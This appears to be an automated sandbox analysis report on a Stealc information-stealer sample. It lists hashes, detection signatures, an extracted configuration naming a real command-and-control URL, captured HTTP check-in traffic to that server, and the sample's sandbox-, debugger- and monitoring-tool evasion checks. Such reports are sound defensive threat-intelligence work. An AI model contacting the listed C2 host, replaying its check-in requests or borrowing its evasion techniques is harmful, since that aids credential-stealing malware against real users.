Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1541095
MD5:3232476789303ec2731e9ccce8937fea
SHA1:9d2054302efc53083547e139d7f8a7487e909c89
SHA256:8e46ac374c025d82eb6c7c0db64706ce2546735b1dc5758087fb6fbe9041af84
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3884 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3232476789303EC2731E9CCCE8937FEA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2140370390.0000000005480000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 3884JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 3884JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.af0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-24T12:11:08.098877+020020442431Malware Command and Control Activity Detected192.168.2.649711185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.af0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 47%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00AFC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00AF9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00AF7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00AF9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B08EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00B08EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00B038B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B04910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B04910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00AFDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00AFE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00AFED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B04570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00B04570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B03EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00B03EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00AFF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00AF16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00AFDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00AFBE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFBGHIDBGHJJKFHJDHCHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 35 37 32 41 32 38 44 32 36 37 39 34 33 34 30 30 30 36 33 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 2d 2d 0d 0a Data Ascii: ------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="hwid"A0572A28D267943400063------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="build"doma------CAFBGHIDBGHJJKFHJDHC--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00AF4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFBGHIDBGHJJKFHJDHCHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 35 37 32 41 32 38 44 32 36 37 39 34 33 34 30 30 30 36 33 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 2d 2d 0d 0a Data Ascii: ------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="hwid"A0572A28D267943400063------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="build"doma------CAFBGHIDBGHJJKFHJDHC--
                Source: file.exe, 00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2182986141.00000000018E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2182986141.00000000018E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2182986141.0000000001902000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2182986141.0000000001915000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2182986141.00000000018D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2182986141.0000000001902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php%M
                Source: file.exe, 00000000.00000002.2182986141.0000000001902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpqM
                Source: file.exe, 00000000.00000002.2182986141.00000000018E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/l
                Source: file.exe, 00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37G

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C00_2_00EB08C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB51E00_2_00EB51E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EBB9A60_2_00EBB9A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB19540_2_00EB1954
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAC92D0_2_00EAC92D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAB1120_2_00EAB112
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB827D0_2_00EB827D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAE3330_2_00EAE333
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB331D0_2_00EB331D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA2C700_2_00EA2C70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9043A0_2_00E9043A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9FD810_2_00D9FD81
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB9D460_2_00EB9D46
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA9E650_2_00EA9E65
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E0CFF50_2_00E0CFF5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F257B40_2_00F257B4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6879F0_2_00D6879F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB67740_2_00EB6774
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00AF45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: oxbstytm ZLIB complexity 0.9948882211538461
                Source: file.exe, 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2140370390.0000000005480000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B08680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00B08680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B03720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00B03720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\42GZ7YUB.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 47%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1820160 > 1048576
                Source: file.exeStatic PE information: Raw size of oxbstytm is bigger than: 0x100000 < 0x196400

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.af0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;oxbstytm:EW;yzvcyrux:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;oxbstytm:EW;yzvcyrux:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B09860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B09860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c612d should be: 0x1c6f15
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: oxbstytm
                Source: file.exeStatic PE information: section name: yzvcyrux
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F138FF push ebp; mov dword ptr [esp], edx0_2_00F13909
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F388D5 push 6AD28FF2h; mov dword ptr [esp], ecx0_2_00F3895E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F388D5 push 5ED95401h; mov dword ptr [esp], edx0_2_00F389A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F388D5 push ebp; mov dword ptr [esp], eax0_2_00F389CE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push esi; mov dword ptr [esp], 7F1C28C1h0_2_00EB090B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push edx; mov dword ptr [esp], ebp0_2_00EB09FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push edi; mov dword ptr [esp], edx0_2_00EB0A29
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push eax; mov dword ptr [esp], edx0_2_00EB0A91
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push ebx; mov dword ptr [esp], eax0_2_00EB0B49
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push esi; mov dword ptr [esp], esp0_2_00EB0B73
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push 68F7BF9Eh; mov dword ptr [esp], ebx0_2_00EB0C9D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push edi; mov dword ptr [esp], eax0_2_00EB0CCD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push 7D942431h; mov dword ptr [esp], ecx0_2_00EB0D20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push esi; mov dword ptr [esp], eax0_2_00EB0D53
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push 0A548464h; mov dword ptr [esp], edx0_2_00EB0D74
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push ebx; mov dword ptr [esp], eax0_2_00EB0DEC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push 0770DB0Bh; mov dword ptr [esp], ecx0_2_00EB0E10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push 5C0CC3EBh; mov dword ptr [esp], eax0_2_00EB0E29
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push edx; mov dword ptr [esp], ebp0_2_00EB0E4B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push 06CF39DFh; mov dword ptr [esp], ebp0_2_00EB0EAD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push ebx; mov dword ptr [esp], ebp0_2_00EB0EE9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push 4C65E077h; mov dword ptr [esp], ebx0_2_00EB0F64
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push 5AF5E3FBh; mov dword ptr [esp], ebx0_2_00EB0F8C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push eax; mov dword ptr [esp], ecx0_2_00EB100C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push 70C116A9h; mov dword ptr [esp], eax0_2_00EB108F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push 3B2BA97Dh; mov dword ptr [esp], eax0_2_00EB10E7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push esi; mov dword ptr [esp], esp0_2_00EB1111
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push ebx; mov dword ptr [esp], 1435C863h0_2_00EB112E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB08C0 push eax; mov dword ptr [esp], esp0_2_00EB11D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01179174 push 0AB5F4ABh; mov dword ptr [esp], edx0_2_0117919E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01179174 push eax; mov dword ptr [esp], ecx0_2_011791C3
                Source: file.exeStatic PE information: section name: oxbstytm entropy: 7.954384653876487

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B09860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B09860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13414
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D521BC second address: D521C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D521C6 second address: D521CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D521CC second address: D519BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007FC221A94B2Fh 0x0000000e push dword ptr [ebp+122D04E9h] 0x00000014 jmp 00007FC221A94B2Bh 0x00000019 call dword ptr [ebp+122D2819h] 0x0000001f pushad 0x00000020 jmp 00007FC221A94B37h 0x00000025 xor eax, eax 0x00000027 jmp 00007FC221A94B34h 0x0000002c mov edx, dword ptr [esp+28h] 0x00000030 stc 0x00000031 sub dword ptr [ebp+122D2F78h], edi 0x00000037 mov dword ptr [ebp+122D2B56h], eax 0x0000003d jmp 00007FC221A94B2Eh 0x00000042 mov esi, 0000003Ch 0x00000047 mov dword ptr [ebp+122D19E9h], edi 0x0000004d add esi, dword ptr [esp+24h] 0x00000051 jno 00007FC221A94B2Ch 0x00000057 lodsw 0x00000059 pushad 0x0000005a jnl 00007FC221A94B2Ch 0x00000060 mov ecx, dword ptr [ebp+122D2B16h] 0x00000066 popad 0x00000067 add eax, dword ptr [esp+24h] 0x0000006b mov dword ptr [ebp+122D1B69h], edx 0x00000071 mov ebx, dword ptr [esp+24h] 0x00000075 clc 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 jnp 00007FC221A94B3Eh 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC2295 second address: EC229B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
